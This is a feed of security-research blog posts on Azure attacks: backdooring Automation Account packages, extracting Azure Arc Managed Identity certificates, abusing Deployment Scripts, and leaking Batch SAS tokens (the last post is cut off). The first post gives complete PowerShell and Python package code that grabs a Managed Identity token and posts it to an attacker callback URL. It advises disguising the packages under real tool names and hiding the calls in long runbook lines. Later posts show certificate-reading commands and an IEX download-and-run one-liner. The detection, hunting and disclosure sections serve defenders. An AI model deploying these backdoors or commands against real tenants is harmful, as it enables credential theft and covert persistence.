Karl Fosaaen, Author at NetSPI The Proactive Security Solution Mon, 23 Sep 2024 16:30:04 +0000 en-US hourly 1 https://wordpress.org/?v=6.7.1 https://www.netspi.com/wp-content/uploads/2024/03/favicon.png Karl Fosaaen, Author at NetSPI 32 32 Backdooring Azure Automation Account Packages and Runtime Environments  https://www.netspi.com/blog/technical-blog/cloud-pentesting/backdooring-azure-automation-account-packages-and-runtime-environments/ Tue, 24 Sep 2024 14:00:00 +0000 https://www.netspi.com/?p=25550 Azure Automation Accounts can allow an attacker to persist in the associated packages that support runbooks. Learn how attackers can maintain access to an Automation Account.

The post Backdooring Azure Automation Account Packages and Runtime Environments  appeared first on NetSPI.

]]>
Over the years, the Azure Automation Account service has grown and changed significantly. One of the more recent changes is the introduction of Runtime Environments to replace the more traditional module and package management functionality. Azure Automation Accounts have long been a focus of posts on the NetSPI Blog, but we have not really focused on attacks against the modules or packages that support the accounts. The Automation Account service allows you to specify your own custom modules and packages to use in your runbooks, which can be back-doored to allow an attacker persistent access to the Automation Account.  

Additional Resources: 

Prior to the introduction of Runtime Environments, all of the PowerShell modules and Python Packages have been managed in the Portal under the “Modules” and “Python packages” menus. At the time of writing, it is still the standard package management option, so you may not have the Runtime Environments preview enabled yet. These menus allow Automation Account admins to add additional functionality to their PowerShell and Python runbook environments. As a point of terminology, we will use the terms “packages” and “modules” interchangeably throughout the rest of the blog. 

TL;DR 

  • Azure Automation Accounts allow custom PowerShell modules and Python packages 
    • PowerShell Gallery modules are also supported 
  • Malicious packages can be uploaded to an Automation Account by attackers 
    • The packages can then be called in runbooks for persistence 
    • We’ve included steps below to replicate the process 
  • We’ve created a tool (Get-AzAutomationCustomModules) to help list custom modules/packages that are used in a subscription

What are Runtime Environments? 

The Runtime Environments feature (currently in preview) allows users to set up custom execution environments for Automation Account Runbooks. This allows users to configure specific packages that can be used for an Automation Account container. This gives greater flexibility for an Automation Account, without creating package bloat on the base containers.

It should be noted that in the new Runtime Environments system, the base “System-generated Runtime environments” cannot be modified in the portal to include additional packages. However, if you switch back to the old experience, you can add packages that will then carry over to the new System-generated environments when you switch to the Runtime Environments feature.  

It’s an interesting quirk, but once the feature becomes standard, it’s unlikely that you will be able to change these base environments. If this does become the standard going forward, an attacker would need create a new runtime, inject a malicious package into it, and swap the environment over for the target runbook. Alternatively, they could just create a new runbook and assign a new Runtime Environment to it. 

Creating a Malicious Package – PowerShell 

In order to attack the Automation Account, we will need to create a malicious package. Keep in mind that the package name will be very visible in the Runtime Environment menu, so it may make sense to “borrow” a package name from a known package. You could just take an existing package file, modify it, and upload it, but for our proof of concept examples, we will show how to create your own custom packages.  

In both custom package examples, we will create functions that will generate a Managed Identity token for the Automation Account, and exfiltrate the token via HTTP to a callback URL (YOUR_URL_HERE). Overwrite the hardcoded URL in the example files to use this yourself. 

Note that all of the example files are available under the “Misc/Packages” folder in the MicroBurst repository

In this PowerShell proof of concept, we’ll borrow the PowerUpSQL name for our module. For starters, we will create a basic PowerShell package. The most basic PowerShell package consists of two files, a psd1 that outlines the module and a psm1 that contains the code.

PowerUpSQL.psd1

@{ 

# Script module or binary module file associated with this manifest. 
RootModule = 'PowerUpSQL.psm1' 

# Version number of this module. 
ModuleVersion = '1.105.0' 

# ID used to uniquely identify this module 
GUID = 'dd1fe106-2226-4869-9363-44469e930a4a' 

# Author of this module 
Author = 'Scott Sutherland' 

# Company or vendor of this module 
CompanyName = 'NetSPI' 

# Copyright statement for this module 
Copyright = '(c) 2024 NetSPI. All rights reserved.' 

# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. 
FunctionsToExport = '*' 

# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. 
CmdletsToExport = '*' 

# Variables to export from this module 
VariablesToExport = '*' 

# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. 
AliasesToExport = '*' 

} 

PowerUpSQL.psm1 

function a { 
param( 
    [string] $callbackURL = "https://YOUR_URL_HERE/" 
    ) 

# Hide the warning output 
$SuppressAzurePowerShellBreakingChangeWarnings = $true 

# Connect as the System-Assigned Managed Identity 
Connect-AzAccount -Identity | Out-Null 

# Get a token 
$token = Get-AzAccessToken | ConvertTo-Json 

# Send the token to the callback URL 
Invoke-RestMethod -Uri $callbackURL -Method Post -Body $token | Out-Null 

} 

Export-ModuleMember -Function a 

In this example, we’ve just named our function “a”, but you can name it whatever you want. A single letter might get overlooked, but using something that looks legitimate (Example: Get-AzAutomationAccountUpdates) may also work better. 

The Automation Account will be looking for a zip file, so zip the two files together and name it after your module. Regardless of what is in the psd1 file, the portal will show the module name as whatever the zip file name was, so keep that in mind.

Creating a Malicious Package – Python 

For the Python package, we will need the following files in a directory: 

your_project/ 
├── your_module/ 
│   ├── __init__.py 
│   └── other_module_files.py 
├── README.md 
├── LICENSE 
├── setup.py 

For our Python proof of concept, we’ll use aws_consoler (another NetSPI tool) as the module target, so our folder will be aws_consoler and the module file will be aws_consoler.py. Please keep in mind that you may have to change specific fields (python_requires) below depending on your use case.

setup.py

import setuptools 

with open("README.md", "r") as fh: 
    long_description = fh.read() 

setuptools.setup( 
    name="aws_consoler", 
    version="1.1.0", 
    author="Ian Williams", 
    author_email="ian.williams@netspi.com", 
    description="A utility to convert your AWS CLI credentials into AWS " 
                "console access.", 
    long_description=long_description, 
    long_description_content_type="text/markdown", 
    packages=setuptools.find_packages(), 
    classifiers=[ 
        'Development Status :: 2 - Pre-Alpha', 
        'Intended Audience :: Developers', 
        'License :: OSI Approved :: BSD License', 
        'Natural Language :: English', 
        'Programming Language :: Python :: 3.8', 
    ], 
    python_requires='>=3.8', 
) 

__init__.py 

Although we’re not using a function for this example, this file needs to try to import any functions that it can from our malicious Python file: 

from .aws_consoler import * 

aws_consoler.py 

import os 
import requests 
import json 

endpoint_url = "https:// YOUR_URL_HERE" 
identity_endpoint = os.getenv('IDENTITY_ENDPOINT') 
if not identity_endpoint: 
    raise ValueError("IDENTITY_ENDPOINT environment variable not set.") 

# Fetch the token 
params = { 
    'api-version': '2018-02-01', 
    'resource': 'https://management.azure.com/' 
} 
headers = { 
    'Metadata': 'true' 
} 

try: 
    response = requests.get(identity_endpoint, params=params, headers=headers) 
    response.raise_for_status() 
    token = response.json() 

    # Send the token to the specified endpoint 
    post_headers = { 
        'Content-Type': 'application/json' 
    } 
    data = { 
        'token': token 
    } 

    post_response = requests.post(endpoint_url, headers=post_headers, data=json.dumps(data)) 
    post_response.raise_for_status() 

    #return post_response.json() 
except requests.exceptions.RequestException as e: 
    print("An exception occurred") 

In order to be uploaded to the Python Runtime Environment, we will need to compile these files into a WHL file. This can be done in python with the following command: 

python3 setup.py bdist_wheel 

Uploading a Malicious Package 

Now that we have our zipped/compiled packages, we will first show how the current (old) style of module/package upload works. There are two menus that cover this functionality – Modules and Python packages: 

The upload for both options is very simple. You can use the “Add a module” and “Add a Python Package” buttons in the appropriate menus to start the process. Select your file to upload, your Runtime version, name the package, and select import. Keep in mind, that any packages that you upload in the old system will carry over to the new System-generated environments in the Runtime Environments interface. 

If you are working with a Runtime Environment, the process is going to be very similar. At this point, we have two options – Modifying an existing Runtime Environment or creating a new one and assigning runbooks to it.

By modifying an existing Runtime Environment, you will have fewer indicators of your malicious package activities. However, this will not work in cases where the runbooks are using the system-generated environments. It’s not possible to add additional packages to those environments in the current interface, so you would have to create a new environment to move (Under the “Update Runtime Environment” menu) the runbook to. Alternatively, you can switch back to the old experience, add your packages to the environment, and switch back.

Using the Packages 

Once we have added our malicious packages to the Automation Account and/or Runtime Environment, we will need to call them in a runbook in order to use them. Since the sample code calls back to a URL with a Managed Identity token, make sure that you have your HTTP listener ready to go. 

For PowerShell runbooks, you can just add a line to call your new function. If you want to be extra sneaky about it, end an existing PowerShell line with a “;” and add your new function after that. If the line is particularly long, there’s a decent chance that it will get overlooked by being at the end of the line. Technically, you could also throw any other PowerShell obfuscation technique at the function name at this point as well. 

For the Python runbooks, you will need to import the package (aws_consoler): 

import aws_consoler

If you’ve modified an existing runbook, you can just wait for it to be run. If you created a new runbook, now would be a good time to schedule the runbook (once an hour?) to regularly check in with a token for you. 

As a final note for persistence, if you have the ability to write runbooks and packages, you probably have the ability to write webhooks for the runbooks. These are a bit out of scope for this blog, but they are a nice way to generate a persistence mechanism for calling an Automation Account runbook, if you get removed from an environment. 

Detection and Hunting Recommendations 

To help detect any existing malicious packages in your Automation Accounts, you can manually review your current modules and packages for any custom modules in the Azure portal. 

Alternatively, we have written a PowerShell script (Get-AzAutomationCustomModules) that will enumerate all of your Automation Accounts and will output a list of custom packages. This utilizes an authenticated Az PowerShell module connection to make the calls, so make sure to Connect-AzAccount before running the tool. 

The tool usage is pretty simple, just import the module (ipmo Get-AzAutomationCustomModules.ps1) and run the function “Get-AzAutomationCustomModules -verbose”. 

The output is pipeline friendly, so you can pipe it to Export-Csv for further review. Due to how the old package management system worked, you may also see some of the previously updated packages as custom packages. I have an older Automation Account that I was testing the script against and found that the AzureRM, Azure, and AzureAD modules were showing up as custom. I’m not 100% sure how they ended up that way, but I believe these are false positives that you may also run into.

Detection and Hunting Opportunities 

See below for additional detection and hunting opportunities: 

Detection Opportunity #1: Packages added to an Azure Automation Account 
Data Source: Cloud Service 
Detection Strategy: Behavior 
Detection Concept:  
Using Azure Activity Log, detect on when any of the following actions are taken against an Automation Account via Azure Credentials: 

  • Microsoft.Automation/automationAccounts/runbooks/draft/write 
  • Microsoft.Automation/automationAccounts/runbooks/publish/action 
  • Microsoft.Automation/automationAccounts/jobs/write 
  • Microsoft.Automation/automationAccounts/listbuiltinmodules/action 
  • Microsoft.Automation/automationAccounts/powershell72Modules/write  
  • Microsoft.Automation/automationAccounts/runtimeEnvironments/packages/delete 
  • Microsoft.Automation/automationAccounts/runtimeEnvironments/write 

Detection Reasoning: A threat actor can use the package upload function to add packages to the Automation Account. Once added, the malicious packages can be used in a runbook. 
Known Detection Consideration: None 

Hunting Opportunity #1: Automation Account Package File Inspection 
Data Source: Cloud Service Metadata 
Detection Strategy: Signature 
Hunting Concept:  
Using the previously noted PowerShell function (Get-AzAutomationCustomModules), it is possible to review custom packages that have been added to an Automation Account. 
Detection Reasoning:  
Any malicious packages that are added to an Automation Account will show up as custom packages. This script collects all of the custom packages for an Automation Account. 
Known Detection Consideration: None 

Conclusions 

Given other recent supply chain attacks, I don’t think that it’s unreasonable to expect a threat actor to attempt poisoning packages that are used by Automation Accounts. That said, I have not seen this persistence technique being used in the wild, but we have been talking about this idea for a number of years. Now should be a good time to take a quick look at the packages that you have in your Automation Accounts to see if there’s anything unexpected lurking in the containers. 

The post Backdooring Azure Automation Account Packages and Runtime Environments  appeared first on NetSPI.

]]>
Extracting Managed Identity Certificates from the Azure Arc Service  https://www.netspi.com/blog/technical-blog/cloud-pentesting/extracting-managed-identity-certificates-from-azure-arc-service/ Mon, 05 Aug 2024 14:00:00 +0000 https://www.netspi.com/?p=25067 The Azure Arc service is handy for bringing on-prem systems to the cloud, but it includes features that could lead to pivots from on-prem into your Azure environment.

The post Extracting Managed Identity Certificates from the Azure Arc Service  appeared first on NetSPI.

]]>
Initially announced in 2019, Microsoft created the Azure Arc service to bridge the gap between on-prem resources and the Azure cloud. While this service allows Azure administrators to easily integrate on-prem resources with their Azure cloud environment, it also brings along its own set of security concerns. 

TL;DR

  1. Azure Arc uses a System-Assigned Managed Identity to authenticate enrolled systems to Azure
  2. The authentication certificate associated with the Managed Identity is stored on the enrolled system: 
    1. Windows – “C:\ProgramData\AzureConnectedMachineAgent\Certs\myCert.cer” 
    2. Linux – “/var/opt/azcmagent/certs/myCert” 
  3. This certificate can be extracted from the system (by local administrators) and used to authenticate as the Managed Identity away from the resource: 
    1. This authentication lacks important logging details (source IP, etc.) in Entra ID 
    2. This architecture breaks the fundamental model for Managed Identities and their credentials 
    3. Any Azure permissions/role applications for the Managed Identity are then available to the attacker. 
    4. These certificates are not controlled by the resource owner, so if one is compromised, the system needs to be removed from Arc and reenrolled to cycle the certificate. 
  4. We wrote a tool to automate the process of extracting these certificates from Arc systems 

Azure Arc 

The core functionality of the Arc service allows Azure administrators to manage and integrate on-prem resources into the cloud. This includes the ability to run commands on systems, extend SQL access to web applications, and enroll systems from other cloud providers. While all this functionality is useful, the authentication model that’s used to integrate these systems into the Azure Arc service has a fundamental flaw. The authentication for the service utilizes a System-Assigned Managed Identity that stores its credential (a certificate) on the Arc system. These credentials are then available to anyone with local administrator access to the system. 

Certificate Storage 

Depending on the operating system, the credential (a PFX file) will be stored in one of two places: 

  1. Windows – “C:\ProgramData\AzureConnectedMachineAgent\Certs\myCert.cer” 
  2. Linux – “cat /var/opt/azcmagent/certs/myCert” 

*Note that neither file has a PFX file extension, but they are both PFX files, that do not have passwords

Accessing the certificate does require local administrator (or root) permissions, and Microsoft considers this security boundary to be the responsibility of the system owner. Microsoft acknowledges this in their documentation, noting that “The agent automatically applies an access control list to this directory, restricting access to local administrators and the “himds” account.”. 

It should be noted that the Arc service does not grant any default roles to the associated Managed Identities, but Microsoft’s own documentation does recommend adding roles to them. This is recommended to make it easier for the Arc systems to access Azure resources, like Key Vaults. Since there are no default role applications for the Managed Identities, there is no inherent privilege elevation risk associated with enrolling a system in Arc. That said, we have seen practical usage of Arc in several client environments, and the associated Managed Identities are often getting subscription (or resource) level permissions assigned.

Thanks to the functionality of the Arc platform, any user with “Write” permissions on a “HybridCompute” resource can create “run commands” on the systems that allow for command execution. Utilizing the command execution functionality, an attacker would be able to get the Base64 string of the private certificate and save it off to their attacking system. While the run command feature is not yet available in the Portal, it is possible to queue up commands with both the Az CLI and the Management REST APIs.

Extracting Managed Identity Certificates with MicroBurst 

As attackers, we typically want to automate as many tasks as we can. If we do get “HybridCompute” write permissions, an automated solution will help us gather the Managed Identity credentials as fast as possible. These credentials can then be used for persistence and (potentially) for privilege escalation, depending on the applied roles. 

To make this whole process easier, we have added a script (Get-AzArcCertificates) to the MicroBurst toolkit. Below is an overview of the script and its usage. 

Script Overview: 

  1. Check the Az PowerShell module authentication 
  2. Prompt for a Subscription to use 
  3. Enumerate the available “Microsoft.HybridCompute/machines” resources in the subscription 
  4. Select the systems to attack 
  5. Loop through the selected systems 
    1. Create the Run Command instance for the resource 
    2. Wait for the command to execute 
    3. Write the certificate to a local file with the “AuthenticateAs” script 
    4. Delete the Run Command instance 

Usage – Import the function:

ipmo .\MicroBurst\Az\Get-AzArcCertificates.ps1

Usage – Run the function:

PS C:\MicroBurst> Get-AzArcCertificates -Verbose  
VERBOSE: Logged In as kfosaaen@example.com 
VERBOSE: Enumerating Azure Arc Resources in the "Sample Subscription" Subscription 
VERBOSE: 	1 Azure Arc Resource(s) enumerated in the "Sample Subscription" Subscription 
VERBOSE: 		Starting extraction on the i-001aab1bcba8519b1 system 
VERBOSE: 			The i-001aab1bcba8519b1 system is registered as a Windows system 
VERBOSE: 			Adding the SLTImRxhgyukwjE command to the i-001aab1bcba8519b1 system 
VERBOSE: 				Sleeping 10 seconds to allow the command to execute 
VERBOSE: 			Getting the command results from the i-001aab1bcba8519b1 system 
VERBOSE: 				Sleeping additional 5 seconds to allow the command to execute 
VERBOSE: 			Writing the certificate to C:\ MicroBurst\6843069d-5b5b-4618-86ac-0ccc8d6a6476.pfx 
VERBOSE: 				Run .\AuthenticateAs-6843069d-5b5b-4618-86ac-0ccc8d6a6476.ps1 (as a local admin) to import the cert and login as the Managed Identity for the i-001aab1bcba8519b1 system 
VERBOSE: 			Removing the SLTImRxhgyukwjE command from the i-001aab1bcba8519b1 system 
VERBOSE: Azure Arc certificate extraction completed for the "Sample Subscription" Subscription 

As noted in the script output, an “AuthenticateAs-*.ps1” script is generated, along with writing the PFX file to the current directory. In a local admin PowerShell session, this script can then be used to authenticate to the Az PowerShell module as the Managed Identity. 

At this point, we are authenticated as the Managed Identity and can utilize any of the roles/permissions applied to it. Since the normal tokens generated by a Managed Identity have a short lifetime, these certificates grant us significantly longer access to the identity. 

Detection and Hunting Opportunities 

There are several detection and hunting options for this attack. Keep in mind that an attacker may not use this specific tool, and they may just directly authenticate to the Arc system to extract the certificates. 

Detection Opportunity #1: Run command instance used on Azure Arc systems 

Data Source: Command Execution
Detection Strategy: Behavior
Detection Concept: Using Azure Activity Log, detect on when any of the following commands are run an an Arc System via Azure Credentials: 

  • Microsoft.HybridCompute/machines/runCommands/write 
  • Microsoft.HybridCompute/machines/runcommands/read 
  • Microsoft.HybridCompute/machines/extensions/write 

Detection Reasoning: A threat actor can use the run command function to extract the certificate from an Arc system without having existing local access.  

The following commands are used by the Microburst tool: 

  • Windows: gc C:\ProgramData\AzureConnectedMachineAgent\Certs\myCert.cer 
  • Linux: cat /var/opt/azcmagent/certs/myCert 

Known Detection Consideration: None 

Detection Opportunity #2: Command run locally to extract certificate 

Data Source: Process Creation
Detection Strategy: Signature 
Detection Concept: Detect when a process is created with the following command line signatures: 

Windows

gc C:\ProgramData\AzureConnectedMachineAgent\Certs\myCert.cer

Linux

cat /var/opt/azcmagent/certs/myCert

Detection Reasoning: If a threat actor has local access to the Arc system they can extract the Managed Identity certificate using the previously noted commands. 
Known Detection Consideration: While the “get-content” (gc) and cat” commands are listed as examples, there are other commands that could be run to get access to the file, including using other binaries and protocols (HTTP, FTP, etc.) to exfiltrate the files. 

Detection Opportunity #3:  Managed Identity anomalous activities 

Data Source: Cloud Service 
Detection Strategy: Behavior 
Detection Concept: Look for any Managed Identities that are taking actions similar to what an attacker may do (listing resources, attempting to access unauthorized resources). Alternatively, you can start with expected activities for the Managed Identity (accessing specific resources) and then alert on events outside of that scope.  
Detection Reasoning: Given that the Arc System-Assigned Managed Identity should not be utilized for actions outside of its normal scope, there is potential to catch anomalous login behaviors. 
Known Detection Consideration: None

Hunting Opportunity #1: Azure VM File Inspection 

Data Source: File Creation  
Detection Strategy: Behavior 
Hunting Concept: Look for evidence of run commands on Arc Systems that would indicate this type of activity. 
Windows – The specific commands that were run can be found by investigating the script files in the “C:\Packages\Plugins\microsoft.cplat.core.runcommandhanderwindows\2.0.9\Downloads” directory. Note that the 2.0.9 denotes the version of the RunCommand extension and may differ on your Virtual Machine.

Linux – The specific commands that were run, can be found by investigating the temporary files in the “/var/lib/waagent/microsoft.cplat.core.runcommandhandlerlinux-1.3.7/config/$RUNCOMMANDNAME.0.settings ” file, where $RUNCOMMANDNAME is the name of the command. 

The settings file contains the following runtime settings, which include the executed command in the public settings field: 

{"runtimeSettings":[{"handlerSettings":{"protectedSettings":"[Truncated] ","protectedSettingsCertThumbprint":"runcommandhandlerlinux.FRQZhHOsNbwJLil","publicSettings":{"asyncExecution":false,"parameters":[],"source":{"script":"cat /var/opt/azcmagent/certs/myCert"},"timeoutInSeconds":0}}}]}

Detection Reasoning:
When using the run command action on an Arc system, there will be residual files left on the Arc system. 
Known Detection Consideration:
Note that the Windows extension will be removed after the run command instance is removed, so this data may be temporarily available. Additionally, the script files themselves may not be persistent in the directories, or they may get cleaned up by the attacker. 
Managed Identity Sign-in Log Addendum:
As an additional detection note, the logging of Managed Identity authentication will be virtually indistinguishable from the normal usage of the Managed Identity on the resource. Since Microsoft does not expect a Managed Identity credential to be used outside of the Azure resource it is assigned to, an IP address is not logged for the authentication event in Entra ID. 

This issue has been raised with MSRC in the past (See the Function Apps blog), but it was dismissed:

These credentials are not intended to be used externally by customers, so the logs aren't surfaced in customer logs. The fix to this issue is the fix to ensure that these credentials are not exposed.

Conclusions 

The accessibility of the certificates, in both Windows and Linux, was raised as two separate tickets to MSRC on April 23, 2024. Both tickets were dismissed on June 12, 2024 with the justification that this is expected behavior for the service. I also had one last call with MSRC and the Arc team on June 20, 2024 to clarify some final points (lack of logging, credential rotation, persistence) on the tickets. 

While I still don’t know if Managed Identities are the best route to enable authentication to an Entra ID tenant, I understand why the service team chose this option. Since these Arc systems do not actually live in Azure, where they could rely on internal cloud management fabric, they need to have some credentials to authenticate up to the cloud. Storing a key would have all the same problems as the Managed Identity certificates but would lack the ability to regularly rotate credentials that are included in the current configuration. The Managed Identity method of authentication allows the systems to get some form of access to the Azure tenant, but I do have concerns around storing credentials (regardless of the directory level protections) on the system. 

Previous Research 

Experimenting with Azure Arc – Matt Felton
https://journeyofthegeek.com/2021/06/12/experimenting-with-azure-arc/

The post Extracting Managed Identity Certificates from the Azure Arc Service  appeared first on NetSPI.

]]>
Azure Deployment Scripts: Assuming User-Assigned Managed Identities https://www.netspi.com/blog/technical-blog/cloud-pentesting/azure-user-assigned-managed-identities-via-deployment-scripts/ Thu, 14 Mar 2024 13:00:00 +0000 https://www.netspi.com/azure-user-assigned-managed-identities-via-deployment-scripts/ Learn how to use Deployment Scripts to complete faster privilege escalation with Azure User-Assigned Managed Identities.

The post Azure Deployment Scripts: Assuming User-Assigned Managed Identities appeared first on NetSPI.

]]>
As Azure penetration testers, we often run into overly permissioned User-Assigned Managed Identities. This type of Managed Identity is a subscription level resource that can be applied to multiple other Azure resources. Once applied to another resource, it allows the resource to utilize the associated Entra ID identity to authenticate and gain access to other Azure resources. These are typically used in cases where Azure engineers want to easily share specific permissions with multiple Azure resources. An attacker, with the correct permissions in a subscription, can assign these identities to resources that they control, and can get access to the permissions of the identity. 

When we attempt to escalate our permissions with an available User-Assigned Managed Identity, we can typically choose from one of the following services to attach the identity to:

Once we attach the identity to the resource, we can then use that service to generate a token (to use with Microsoft APIs) or take actions as that identity within the service. We’ve linked out on the above list to some blogs that show how to use those services to attack Managed Identities. 

The last item on that list (Deployment Scripts) is a more recent addition (2023). After taking a look at Rogier Dijkman’s post – “Project Miaow (Privilege Escalation from an ARM template)” – we started making more use of the Deployment Scripts as a method for “borrowing” User-Assigned Managed Identities. We will use this post to expand on Rogier’s blog and show a new MicroBurst function that automates this attack.

TL;DR 

  • Attackers may get access to a role that allows assigning a Managed Identity to a resource 
  • Deployment Scripts allow attackers to attach a User-Assigned Managed Identity 
  • The Managed Identity can be used (via Az PowerShell or AZ CLI) to take actions in the Deployment Scripts container 
  • Depending on the permissions of the Managed Identity, this can be used for privilege escalation 
  • We wrote a tool to automate this process 

What are Deployment Scripts? 

As an alternative to running local scripts for configuring deployed Azure resources, the Azure Deployment Scripts service allows users to run code in a containerized Azure environment. The containers themselves are created as “Container Instances” resources in the Subscription and are linked to the Deployment Script resources. There is also a supporting “*azscripts” Storage Account that gets created for the storage of the Deployment Script file resources. This service can be a convenient way to create more complex resource deployments in a subscription, while keeping everything contained in one ARM template.

In Rogier’s blog, he shows how an attacker with minimal permissions can abuse their Deployment Script permissions to attach a Managed Identity (with the Owner Role) and promote their own user to Owner. During an Azure penetration test, we don’t often need to follow that exact scenario. In many cases, we just need to get a token for the Managed Identity to temporarily use with the various Microsoft APIs.

Automating the Process

In situations where we have escalated to some level of “write” permissions in Azure, we usually want to do a review of available Managed Identities that we can use, and the roles attached to those identities. This process technically applies to both System-Assigned and User-Assigned Managed Identities, but we will be focusing on User-Assigned for this post.

Link to the Script – https://github.com/NetSPI/MicroBurst/blob/master/Az/Invoke-AzUADeploymentScript.ps1

This is a pretty simple process for User-Assigned Managed Identities. We can use the following one-liner to enumerate all of the roles applied to a User-Assigned Managed Identity in a subscription:

Get-AzUserAssignedIdentity | ForEach-Object { Get-AzRoleAssignment -ObjectId $_.PrincipalId }

Keep in mind that the Get-AzRoleAssignment call listed above will only get the role assignments that your authenticated user can read. There is potential that a Managed Identity has permissions in other subscriptions that you don’t have access to. The Invoke-AzUADeploymentScript function will attempt to enumerate all available roles assigned to the identities that you have access to, but keep in mind that the identity may have roles in Subscriptions (or Management Groups) that you don’t have read permissions on.

Once we have an identity to target, we can assign it to a resource (a Deployment Script) and generate tokens for the identity. Below is an overview of how we automate this process in the Invoke-AzUADeploymentScript function:

  • Enumerate available User-Assigned Managed Identities and their role assignments
  • Select the identity to target
  • Generate the malicious Deployment Script ARM template
  • Create a randomly named Deployment Script with the template
  • Get the output from the Deployment Script
  • Remove the Deployment Script and Resource Group Deployment

Since we don’t have an easy way of determining if your current user can create a Deployment Script in a given Resource Group, the script assumes that you have Contributor (Write permissions) on the Resource Group containing the User-Assigned Managed Identity, and will use that Resource Group for the Deployment Script.

If you want to deploy your Deployment Script to a different Resource Group in the same Subscription, you can use the “-ResourceGroup” parameter. If you want to deploy your Deployment Script to a different Subscription in the same Tenant, use the “-DeploymentSubscriptionID” parameter and the “-ResourceGroup” parameter.

Finally, you can specify the scope of the tokens being generated by the function with the “-TokenScope” parameter.

Example Usage:

We have three different use cases for the function:

  1. Deploy to the Resource Group containing the target User-Assigned Managed Identity
Invoke-AzUADeploymentScript -Verbose
  1. Deploy to a different Resource Group in the same Subscription
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "ExampleRG"
  1. Deploy to a Resource Group in a different Subscription in the same tenant
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "OtherExampleRG" -DeploymentSubscriptionID "00000000-0000-0000-0000-000000000000"

*Where “00000000-0000-0000-0000-000000000000” is the Subscription ID that you want to deploy to, and “OtherExampleRG” is the Resource Group in that Subscription.

Additional Use Cases

Outside of the default action of generating temporary Managed Identity tokens, the function allows you to take advantage of the container environment to take actions with the Managed Identity from a (generally) trusted space. You can run specific commands as the Managed Identity using the “-Command” flag on the function. This is nice for obfuscating the source of your actions, as the usage of the Managed Identity will track back to the Deployment Script, versus using generated tokens away from the container.

Below are a couple of potential use cases and commands to use:

  • Run commands on VMs
  • Create RBAC Role Assignments
  • Dump Key Vaults, Storage Account Keys, etc.

Since the function expects string data as the output from the Deployment Script, make sure that you format your “-command” output in the parameter to ensure that your command output is returned.

Example:

Invoke-AzUADeploymentScript -Verbose -Command "Get-AzResource | ConvertTo-Json”

Lastly, if you’re running any particularly complex commands, then you may be better off loading in your PowerShell code from an external source as your “–Command” parameter. Using the Invoke-Expression (IEX) function in PowerShell is a handy way to do this.

Example:

IEX(New-Object System.Net.WebClient).DownloadString(‘https://example.com/DeploymentExec.ps1’) |  Out-String

Indicators of Compromise (IoCs)

We’ve included the primary IoCs that defenders can use to identify these attacks. These are listed in the expected chronological order for the attack.

Operation NameDescription
Microsoft.Resources/deployments/validate/actionValidate Deployment
Microsoft.Resources/deployments/writeCreate Deployment
Microsoft.Resources/deploymentScripts/writeWrite Deployment Script
Microsoft.Storage/storageAccounts/writeCreate/Update Storage Account
Microsoft.Storage/storageAccounts/listKeys/actionList Storage Account Keys
Microsoft.ContainerInstance/containerGroups/writeCreate/Update Container Group
Microsoft.Resources/deploymentScripts/deleteDelete Deployment Script
Microsoft.Resources/deployments/deleteDelete Deployment

It’s important to note the final “delete” items on the list, as the function does clean up after itself and should not leave behind any resources.

Conclusion

While Deployment Scripts and User-Assigned Managed Identities are convenient for deploying resources in Azure, administrators of an Azure subscription need to keep a close eye on the permissions granted to users and Managed Identities. A slightly over-permissioned user with access to a significantly over-permissioned Managed Identity is a recipe for a fast privilege escalation.

References:

The post Azure Deployment Scripts: Assuming User-Assigned Managed Identities appeared first on NetSPI.

]]>
Extracting Sensitive Information from the Azure Batch Service  https://www.netspi.com/blog/technical-blog/cloud-pentesting/extracting-sensitive-information-from-azure-batch-service/ Wed, 28 Feb 2024 16:41:24 +0000 https://www.netspi.com/extracting-sensitive-information-from-azure-batch-service/ The added power and scalability of Batch Service helps users run workloads significantly faster, but misconfigurations can unintentionally expose sensitive data.

The post Extracting Sensitive Information from the Azure Batch Service  appeared first on NetSPI.

]]>
We’ve recently seen an increased adoption of the Azure Batch service in customer subscriptions. As part of this, we’ve taken some time to dive into each component of the Batch service to help identify any potential areas for misconfigurations and sensitive data exposure. This research time has given us a few key areas to look at in the Azure Batch service, that we will cover in this blog. 

TL;DR

  • Azure Batch allows for scalable compute job execution
    • Think large data sets and High Performance Computing (HPC) applications 
  • Attackers with Reader access to Batch can: 
    • Read sensitive data from job outputs 
    • Gain access to SAS tokens for Storage Account files attached to the jobs 
  • Attackers with Contributor access can: 
    • Run jobs on the batch pool nodes 
    • Generate Managed Identity tokens 
    • Gather Batch Access Keys for job execution persistence 

The Azure Batch service functions as a middle ground between Azure Automation Accounts and a full deployment of an individual Virtual Machine to run compute jobs in Azure. This in-between space allows users of the service to spin up pools that have the necessary resource power, without the overhead of creating and managing a dedicated virtual system. This scalable service is well suited for high performance computing (HPC) applications, and easily integrates with the Storage Account service to support processing of large data sets. 

While there is a bit of a learning curve for getting code to run in the Batch service, the added power and scalability of the service can help users run workloads significantly faster than some of the similar Azure services. But as with any Azure service, misconfigurations (or issues with the service itself) can unintentionally expose sensitive information.

Service Background – Pools 

The Batch service relies on “Pools” of worker nodes. When the pools are created, there are multiple components you can configure that the worker nodes will inherit. Some important ones are highlighted here: 

  • User-Assigned Managed Identity 
    • Can be shared across the pool to allow workers to act as a specific Managed Identity 
  • Mount configuration 
    • Using a Storage Account Key or SAS token, you can add data storage mounts to the pool 
  • Application packages 
    • These are applications/executables that you can make available to the pool 
  • Certificates 
    • This is a feature that will be deprecated in 2024, but it could be used to make certificates available to the pool, including App Registration credentials 

The last pool configuration item that we will cover is the “Start Task” configuration. The Start Task is used to set up the nodes in the pool, as they’re spun up.

The “Resource files” for the pool allow you to select blobs or containers to make available for the “Start Task”. The nice thing about the option is that it will generate the Storage Account SAS tokens for you.

While Contributor permissions are required to generate those SAS tokens, the tokens will get exposed to anyone with Reader permissions on the Batch account.

We have reported this issue to MSRC (see disclosure timeline below), as it’s an information disclosure issue, but this is considered expected application behavior. These SAS tokens are configured with Read and List permissions for the container, so an attacker with access to the SAS URL would have the ability to read all of the files in the Storage Account Container. The default window for these tokens is 7 days, so the window is slightly limited, but we have seen tokens configured with longer expiration times.

